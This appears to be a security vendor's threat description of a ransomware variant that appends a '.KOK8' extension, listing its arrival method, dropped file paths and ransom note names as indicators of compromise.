This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Ransomware drops the following copies of itself into the affected system and executes them:

  • %System Root%\{Malware Path}\{Random Filename}.exe

(Note: %System Root% is the Windows root folder, where it usually is C:\ on all Windows operating system versions.)

It drops the following files:

  • %System Root%\{Malware Path}\{Random numbers}_log.txt
  • %System Root%\{Malware Path}\bad_{Random Characters}.txt
  • %System Root%\{Malware Path}\elog_{Random Characters}.txt
  • %System Root%\{Malware Path}\LFIN_{Random Characters}.txt
  • %System Root%\{Malware Path}\{Random Filename}.bat
  • %Application Data%\{Random Filename}.bat
  • %Application Data%\{Random Filename}.vbs

Ransomware Routine

This Ransomware appends the following extension to the file name of the encrypted files:

  • [{BLOCKED}8@{BLOCKED}ail.com ].{Random Filename}.KOK8

It drops the following file(s) as ransom note:

  • %Application Data%\{Random Filename}.bmp
  • {Encrypted Folder}\#KOK8_README#.rtf
